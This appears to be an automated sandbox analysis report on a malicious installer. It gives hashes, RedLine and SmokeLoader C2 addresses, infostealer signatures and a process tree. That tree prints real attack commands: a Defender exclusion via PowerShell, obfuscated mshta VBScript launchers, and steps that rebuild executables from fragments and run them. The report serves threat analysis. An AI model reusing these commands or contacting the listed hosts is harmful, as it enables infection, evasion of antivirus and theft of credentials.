Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
1812s -
max time network
1819s -
platform
windows11_x64 -
resource
win11 -
submitted
13-10-2021 05:30
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media12
C2
91.121.67.60:2151
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
smokeloader
Version
2020
C2
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
rc4.i32
rc4.i32
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 17 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 7 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 33 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 30 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 43 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
-
Suspicious behavior: SetClipboardViewer 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv c4QZvIvDlEangE8xJGiw+w.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv c4QZvIvDlEangE8xJGiw+w.0.22⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS454469E3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2806⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209c830507d573.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe"C:\Users\Admin\Pictures\Adobe Films\04JJ3RxmoOrkjUmTE75tZicJ.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe"C:\Users\Admin\Pictures\Adobe Films\r0qEA6ZNISqo0Tq09aQk8H2C.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe"C:\Users\Admin\Pictures\Adobe Films\qvgjxjaIyEOYZSsKaNkUA6BG.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\H86qWBuHzWZmGITuNE3X9SxF.exe"H86qWBuHzWZmGITuNE3X9SxF.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1488⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\rv0IoLjCTiAVqq_ZvgumHf0K.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe"C:\Users\Admin\Pictures\Adobe Films\WkcWFH3P8gRGZgykU0ledS3T.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 19367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe"C:\Users\Admin\Pictures\Adobe Films\kcqx8N9nfA3k0vDFYVlSf29e.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\cYUc7wuTDsuE7h7XbhShNkR8.exe" ) do taskkill -iM "%~NXI" -f8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "cYUc7wuTDsuE7h7XbhShNkR8.exe" -f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu029⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l12⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe"C:\Users\Admin\Pictures\Adobe Films\H8jw_4TmnGzyEx6PHssgdCoy.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8e63fdec0,0x7ff8e63fded0,0x7ff8e63fdee09⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=1888 /prefetch:89⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:29⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,17034119904828723174,11798907332187844991,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6968_1142275528" --mojo-platform-channel-handle=2264 /prefetch:89⤵
- Loads dropped DLL
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe"C:\Users\Admin\Pictures\Adobe Films\lbbD1Mb94469URLfxW1wrRWT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe"C:\Users\Admin\Pictures\Adobe Films\WzMNlEBCfd7fUc9yVHJGL8mN.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe"C:\Users\Admin\Pictures\Adobe Films\sBagaJbRYGdhvlfxFPDGBfzx.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe"C:\Users\Admin\Pictures\Adobe Films\DXiS7jLx9LBM1kEuISf6_JlF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe"C:\Users\Admin\Pictures\Adobe Films\F4LLEIXhcwcYCzNp9BKCzYL4.exe"6⤵
-
C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe"C:\Users\Admin\Documents\D58TSz1lDcFUah1qLzzPzlja.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe"C:\Users\Admin\Pictures\Adobe Films\mV0TwJYjjETnUWHpQms2tVRR.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe"C:\Users\Admin\Pictures\Adobe Films\KcN0McfKzo3WBQXDDyqrzH6l.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\gM_Dq9RAigQVrO65QyAT_YbN.exe" ) do taskkill -iM "%~NXI" -f10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "gM_Dq9RAigQVrO65QyAT_YbN.exe" -f11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe"C:\Users\Admin\Pictures\Adobe Films\Pm3g9ctfYddsVPVoDBAKdcm8.exe"8⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 2769⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe"C:\Users\Admin\Pictures\Adobe Films\y27eaN4WzB3Ik0pAQnIEBr9S.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe"C:\Users\Admin\Pictures\Adobe Films\9jJ9ZK8wNOAcHfGlEJ5VsdiO.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 17409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe"C:\Users\Admin\Pictures\Adobe Films\GVi1E2RMXCQC_mvEMhGlJTDv.exe"8⤵
-
